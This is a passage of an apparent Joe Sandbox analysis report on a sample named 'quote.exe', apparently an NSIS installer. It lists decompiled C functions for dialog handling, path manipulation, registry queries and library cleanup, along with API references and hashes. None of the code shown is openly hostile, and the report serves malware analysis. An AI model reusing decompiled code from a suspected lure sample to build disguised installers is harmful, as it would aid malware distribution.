                                                                                      					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E00405FE8(_t31, _t31) >= 0) {
                                                                                      						_t14 = E00405FB9(_t31, "C:\Users\Arthur\AppData\Local\Temp\nsd599A.tmp\System.dll",  *(_t35 + 8));
                                                                                      						_t42 = _t14;
                                                                                      						if(_t42 == 0) {
                                                                                      							goto L13;
                                                                                      						}
                                                                                      					} else {
                                                                                      						goto L13;
                                                                                      					}
                                                                                      				}
                                                                                      				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t35 - 4));
                                                                                      				return 0;
                                                                                      			}












                                                                                      0x00402636
                                                                                      0x00402636
                                                                                      0x00402636
                                                                                      0x0040263b
                                                                                      0x0040263e
                                                                                      0x00402641
                                                                                      0x00402646
                                                                                      0x00402648
                                                                                      0x00402668
                                                                                      0x004026a2
                                                                                      0x0040266a
                                                                                      0x0040266c
                                                                                      0x00402680
                                                                                      0x0040268d
                                                                                      0x0040268d
                                                                                      0x0040264a
                                                                                      0x0040264c
                                                                                      0x00402651
                                                                                      0x0040265f
                                                                                      0x00402662
                                                                                      0x004026a7
                                                                                      0x004026aa
                                                                                      0x00402925
                                                                                      0x00402925
                                                                                      0x004026b0
                                                                                      0x004026b9
                                                                                      0x004026bb
                                                                                      0x004026da
                                                                                      0x004015b4
                                                                                      0x004015b6
                                                                                      0x00000000
                                                                                      0x004015bc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004026bb
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll), ref: 0040268D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsd599A.tmp$C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll
                                                                                      • API String ID: 1659193697-1421760546
                                                                                      • Opcode ID: cbf851dede0de5b856ead35177f4cf7f6014184e4ffab388a508884ee838afdb
                                                                                      • Instruction ID: 2f8f56cab2ec293de193d712fca88bf9bcdcc229c68306483e13e7e6ef2e3e02
                                                                                      • Opcode Fuzzy Hash: cbf851dede0de5b856ead35177f4cf7f6014184e4ffab388a508884ee838afdb
                                                                                      • Instruction Fuzzy Hash: AD11E772A00205ABCB10AFB18F4AAAF77719F44748F25043FE402B71C1EAFD8891565E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00402FB1(intOrPtr _a4) {
                                                                                      				long _t2;
                                                                                      				struct HWND__* _t3;
                                                                                      				struct HWND__* _t6;
                                                                                      
                                                                                      				if(_a4 == 0) {
                                                                                      					__eflags =  *0x42aa20; // 0x0
                                                                                      					if(__eflags == 0) {
                                                                                      						_t2 = GetTickCount();
                                                                                      						__eflags = _t2 -  *0x434f10;
                                                                                      						if(_t2 >  *0x434f10) {
                                                                                      							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F2B, 0);
                                                                                      							 *0x42aa20 = _t3;
                                                                                      							return ShowWindow(_t3, 5);
                                                                                      						}
                                                                                      						return _t2;
                                                                                      					} else {
                                                                                      						return E00406842(0);
                                                                                      					}
                                                                                      				} else {
                                                                                      					_t6 =  *0x42aa20; // 0x0
                                                                                      					if(_t6 != 0) {
                                                                                      						_t6 = DestroyWindow(_t6);
                                                                                      					}
                                                                                      					 *0x42aa20 = 0;
                                                                                      					return _t6;
                                                                                      				}
                                                                                      			}






                                                                                      0x00402fb8
                                                                                      0x00402fd2
                                                                                      0x00402fd8
                                                                                      0x00402fe2
                                                                                      0x00402fe8
                                                                                      0x00402fee
                                                                                      0x00402fff
                                                                                      0x00403008
                                                                                      0x00000000
                                                                                      0x0040300d
                                                                                      0x00403014
                                                                                      0x00402fda
                                                                                      0x00402fe1
                                                                                      0x00402fe1
                                                                                      0x00402fba
                                                                                      0x00402fba
                                                                                      0x00402fc1
                                                                                      0x00402fc4
                                                                                      0x00402fc4
                                                                                      0x00402fca
                                                                                      0x00402fd1
                                                                                      0x00402fd1

                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000,00000000,0040318F,00000001,?,00000007,00000009,0000000B), ref: 00402FC4
                                                                                      • GetTickCount.KERNEL32 ref: 00402FE2
                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
                                                                                      • ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                      • String ID:
                                                                                      • API String ID: 2102729457-0
                                                                                      • Opcode ID: e942aba91c3d4d0b77748caef32317d1a3e8dc78421a0242562119172c6ce506
                                                                                      • Instruction ID: d33bc14a5fcc1787285ca97da28f022d839d2e13e88132ee71d9f244d0d7cdfd
                                                                                      • Opcode Fuzzy Hash: e942aba91c3d4d0b77748caef32317d1a3e8dc78421a0242562119172c6ce506
                                                                                      • Instruction Fuzzy Hash: 4AF05E3160AA21ABC6216F10FF0DA8B7B64BB48B41741487AF842B15E9DB740CA1DB9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 53%
                                                                                      			E00405DEE(void* __eflags, intOrPtr _a4) {
                                                                                      				int _t11;
                                                                                      				signed char* _t12;
                                                                                      				intOrPtr _t18;
                                                                                      				intOrPtr* _t21;
                                                                                      				signed int _t23;
                                                                                      
                                                                                      				E00406411(0x42fa70, _a4);
                                                                                      				_t21 = E00405D91(0x42fa70);
                                                                                      				if(_t21 != 0) {
                                                                                      					E004066C0(_t21);
                                                                                      					if(( *0x434f1c & 0x00000080) == 0) {
                                                                                      						L5:
                                                                                      						_t23 = _t21 - 0x42fa70 >> 1;
                                                                                      						while(1) {
                                                                                      							_t11 = lstrlenW(0x42fa70);
                                                                                      							_push(0x42fa70);
                                                                                      							if(_t11 <= _t23) {
                                                                                      								break;
                                                                                      							}
                                                                                      							_t12 = E0040676F();
                                                                                      							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                      								E00405D32(0x42fa70);
                                                                                      								continue;
                                                                                      							} else {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      						}
                                                                                      						E00405CE6();
                                                                                      						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                                                      					}
                                                                                      					_t18 =  *_t21;
                                                                                      					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                      						goto L1;
                                                                                      					} else {
                                                                                      						goto L5;
                                                                                      					}
                                                                                      				}
                                                                                      				L1:
                                                                                      				return 0;
                                                                                      			}








                                                                                      0x00405dfa
                                                                                      0x00405e05
                                                                                      0x00405e09
                                                                                      0x00405e10
                                                                                      0x00405e1c
                                                                                      0x00405e2c
                                                                                      0x00405e2e
                                                                                      0x00405e46
                                                                                      0x00405e47
                                                                                      0x00405e4e
                                                                                      0x00405e4f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405e32
                                                                                      0x00405e39
                                                                                      0x00405e41
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405e39
                                                                                      0x00405e51
                                                                                      0x00000000
                                                                                      0x00405e65
                                                                                      0x00405e1e
                                                                                      0x00405e24
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405e24
                                                                                      0x00405e0b
                                                                                      0x00000000

                                                                                      APIs
                                                                                        • Part of subcall function 00406411: lstrcpynW.KERNEL32(?,?,00000400,00403596,00433F00,NSIS Error,?,00000007,00000009,0000000B), ref: 0040641E
                                                                                        • Part of subcall function 00405D91: CharNextW.USER32(?,?,0042FA70,?,00405E05,0042FA70,0042FA70,75A33420,?,C:\Users\user\AppData\Local\Temp\,00405B43,?,75A33420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D9F
                                                                                        • Part of subcall function 00405D91: CharNextW.USER32(00000000), ref: 00405DA4
                                                                                        • Part of subcall function 00405D91: CharNextW.USER32(00000000), ref: 00405DBC
                                                                                      • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,75A33420,?,C:\Users\user\AppData\Local\Temp\,00405B43,?,75A33420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E47
                                                                                      • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75A33420,?,C:\Users\user\AppData\Local\Temp\,00405B43,?,75A33420,C:\Users\user\AppData\Local\Temp\), ref: 00405E57
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DEE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 3248276644-3355392842
                                                                                      • Opcode ID: d647ba489e44e4c384e8f234fc99267bc74e37b9af3ba258ec0477dc6db0c33a
                                                                                      • Instruction ID: 87735b5e832f2f8e04389b482ed260ad6458a913df04a2d72dce2697f876d431
                                                                                      • Opcode Fuzzy Hash: d647ba489e44e4c384e8f234fc99267bc74e37b9af3ba258ec0477dc6db0c33a
                                                                                      • Instruction Fuzzy Hash: A5F0F435104D2216C63233369D09AAF1548CE82364759453BF8D1B22D1DB3C8B838CED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 89%
                                                                                      			E004053ED(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                      				int _t15;
                                                                                      				long _t16;
                                                                                      
                                                                                      				_t15 = _a8;
                                                                                      				if(_t15 != 0x102) {
                                                                                      					if(_t15 != 0x200) {
                                                                                      						_t16 = _a16;
                                                                                      						L7:
                                                                                      						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
                                                                                      							_push(_t16);
                                                                                      							_push(6);
                                                                                      							 *0x42d254 = _t16;
                                                                                      							E00404DA2();
                                                                                      						}
                                                                                      						L11:
                                                                                      						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
                                                                                      					}
                                                                                      					if(IsWindowVisible(_a4) == 0) {
                                                                                      						L10:
                                                                                      						_t16 = _a16;
                                                                                      						goto L11;
                                                                                      					}
                                                                                      					_t16 = E00404D22(_a4, 1);
                                                                                      					_t15 = 0x419;
                                                                                      					goto L7;
                                                                                      				}
                                                                                      				if(_a12 != 0x20) {
                                                                                      					goto L10;
                                                                                      				}
                                                                                      				E004043B3(0x413);
                                                                                      				return 0;
                                                                                      			}





                                                                                      0x004053f1
                                                                                      0x004053fb
                                                                                      0x00405417
                                                                                      0x00405439
                                                                                      0x0040543c
                                                                                      0x00405442
                                                                                      0x0040544c
                                                                                      0x0040544d
                                                                                      0x0040544f
                                                                                      0x00405455
                                                                                      0x00405455
                                                                                      0x0040545f
                                                                                      0x00000000
                                                                                      0x0040546d
                                                                                      0x00405424
                                                                                      0x0040545c
                                                                                      0x0040545c
                                                                                      0x00000000
                                                                                      0x0040545c
                                                                                      0x00405430
                                                                                      0x00405432
                                                                                      0x00000000
                                                                                      0x00405432
                                                                                      0x00405401
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405408
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 0040541C
                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 0040546D
                                                                                        • Part of subcall function 004043B3: SendMessageW.USER32(00010446,00000000,00000000,00000000), ref: 004043C5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                      • String ID:
                                                                                      • API String ID: 3748168415-3916222277
                                                                                      • Opcode ID: 26e100c8e936244900aacf90f380f9ed614629df6b7f9272593e4765ff02ca63
                                                                                      • Instruction ID: 5278ea034fccd8c5818adddfb220a11f4cbf18c481ac084eeec191c980f5e464
                                                                                      • Opcode Fuzzy Hash: 26e100c8e936244900aacf90f380f9ed614629df6b7f9272593e4765ff02ca63
                                                                                      • Instruction Fuzzy Hash: F9012C71200609AFDF216F11DD80BDB3B66EB84756F504036FB01752E2C77A8C92DA6E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 90%
                                                                                      			E004062DF(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                                                      				int _v8;
                                                                                      				long _t21;
                                                                                      				long _t24;
                                                                                      				char* _t30;
                                                                                      
                                                                                      				asm("sbb eax, eax");
                                                                                      				_v8 = 0x800;
                                                                                      				_t21 = E0040627E(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                                                      				_t30 = _a16;
                                                                                      				if(_t21 != 0) {
                                                                                      					L4:
                                                                                      					 *_t30 =  *_t30 & 0x00000000;
                                                                                      				} else {
                                                                                      					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                                                      					_t21 = RegCloseKey(_a20);
                                                                                      					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                                                      					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                      						goto L4;
                                                                                      					}
                                                                                      				}
                                                                                      				return _t21;
                                                                                      			}







                                                                                      0x004062ed
                                                                                      0x004062ef
                                                                                      0x00406307
                                                                                      0x0040630c
                                                                                      0x00406311
                                                                                      0x0040634f
                                                                                      0x0040634f
                                                                                      0x00406313
                                                                                      0x00406325
                                                                                      0x00406330
                                                                                      0x00406336
                                                                                      0x00406341
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406341
                                                                                      0x00406355

                                                                                      APIs
                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,0040656E,80000002), ref: 00406325
                                                                                      • RegCloseKey.ADVAPI32(?,?,0040656E,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll), ref: 00406330
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseQueryValue
                                                                                      • String ID: Call
                                                                                      • API String ID: 3356406503-1824292864
                                                                                      • Opcode ID: d70c3446bea39a9e955728d1e3d97a4cd4df477861c945fcd5c6f0c2612e0d48
                                                                                      • Instruction ID: 844154995e22508991f9c2085a3ddc533437a0a8a5a4e2329c4a16b7f523fd8f
                                                                                      • Opcode Fuzzy Hash: d70c3446bea39a9e955728d1e3d97a4cd4df477861c945fcd5c6f0c2612e0d48
                                                                                      • Instruction Fuzzy Hash: CF017172500209EBDF218F55CD05EDB3BA9EB54394F05803AFD5592150E738D964DBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00403A4B() {
                                                                                      				void* _t2;
                                                                                      				void* _t3;
                                                                                      				void* _t6;
                                                                                      				void* _t8;
                                                                                      
                                                                                      				_t8 =  *0x42b22c;
                                                                                      				_t3 = E00403A30(_t2, 0);
                                                                                      				if(_t8 != 0) {
                                                                                      					do {
                                                                                      						_t6 = _t8;
                                                                                      						_t8 =  *_t8;
                                                                                      						FreeLibrary( *(_t6 + 8));
                                                                                      						_t3 = GlobalFree(_t6);
                                                                                      					} while (_t8 != 0);
                                                                                      				}
                                                                                      				 *0x42b22c =  *0x42b22c & 0x00000000;
                                                                                      				return _t3;
                                                                                      			}







                                                                                      0x00403a4c
                                                                                      0x00403a54
                                                                                      0x00403a5b
                                                                                      0x00403a5e
                                                                                      0x00403a5e
                                                                                      0x00403a60
                                                                                      0x00403a65
                                                                                      0x00403a6c
                                                                                      0x00403a72
                                                                                      0x00403a76
                                                                                      0x00403a77
                                                                                      0x00403a7f

                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,75A33420,00000000,C:\Users\user\AppData\Local\Temp\,00403A23,00403839,00000007,?,00000007,00000009,0000000B), ref: 00403A65
                                                                                      • GlobalFree.KERNEL32(?), ref: 00403A6C
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A4B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$GlobalLibrary
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 1100898210-3355392842
                                                                                      • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                      • Instruction ID: 631b6d606f958dd3b9f901d17eba749f6bbdc97bd5f3e27fdad90cb16f3fbd8e
                                                                                      • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                      • Instruction Fuzzy Hash: 1CE0EC3261212097C7219F55BE08B6E7768AF48B22F06146AE9C5BB2608B745D424FD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 77%
                                                                                      			E00405D32(WCHAR* _a4) {
                                                                                      				WCHAR* _t5;
                                                                                      				WCHAR* _t7;
                                                                                      
                                                                                      				_t7 = _a4;
                                                                                      				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                                                      				while( *_t5 != 0x5c) {
                                                                                      					_push(_t5);
                                                                                      					_push(_t7);
                                                                                      					_t5 = CharPrevW();
                                                                                      					if(_t5 > _t7) {
                                                                                      						continue;
                                                                                      					}
                                                                                      					break;
                                                                                      				}
                                                                                      				 *_t5 =  *_t5 & 0x00000000;
                                                                                      				return  &(_t5[1]);
                                                                                      			}





                                                                                      0x00405d33
                                                                                      0x00405d3d
                                                                                      0x00405d40
                                                                                      0x00405d46
                                                                                      0x00405d47
                                                                                      0x00405d48
                                                                                      0x00405d50
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405d50
                                                                                      0x00405d52
                                                                                      0x00405d5a

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\quote.exe,C:\Users\user\Desktop\quote.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D38
                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\quote.exe,C:\Users\user\Desktop\quote.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D48
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrlen
                                                                                      • String ID: C:\Users\user\Desktop
                                                                                      • API String ID: 2709904686-3370423016
                                                                                      • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                                                      • Instruction ID: cdcea1fdb6b733c318131938d2018cbcd3f5257763d90021158e822df2c29c6c
                                                                                      • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                                                      • Instruction Fuzzy Hash: FCD05EB24009209AC3126704DC0999F67A8FF5130078A842BF541AA1A4D7785C818AAC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E6F4910E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                      				void* _v0;
                                                                                      				void* _t17;
                                                                                      				signed int _t19;
                                                                                      				void* _t20;
                                                                                      				void* _t24;
                                                                                      				void* _t26;
                                                                                      				void* _t30;
                                                                                      				void* _t36;
                                                                                      				void* _t38;
                                                                                      				void* _t39;
                                                                                      				signed int _t41;
                                                                                      				void* _t42;
                                                                                      				void* _t51;
                                                                                      				void* _t52;
                                                                                      				signed short* _t54;
                                                                                      				void* _t56;
                                                                                      				void* _t59;
                                                                                      				void* _t61;
                                                                                      
                                                                                      				 *0x6f49506c = _a8;
                                                                                      				 *0x6f495070 = _a16;
                                                                                      				 *0x6f495074 = _a12;
                                                                                      				 *((intOrPtr*)(_a20 + 0xc))( *0x6f495048, E6F4915B1, _t51, _t56);
                                                                                      				_t41 =  *0x6f49506c +  *0x6f49506c * 4 << 3;
                                                                                      				_t17 = E6F491243();
                                                                                      				_v0 = _t17;
                                                                                      				_t52 = _t17;
                                                                                      				if( *_t17 == 0) {
                                                                                      					L16:
                                                                                      					return GlobalFree(_t17);
                                                                                      				} else {
                                                                                      					do {
                                                                                      						_t19 =  *_t52 & 0x0000ffff;
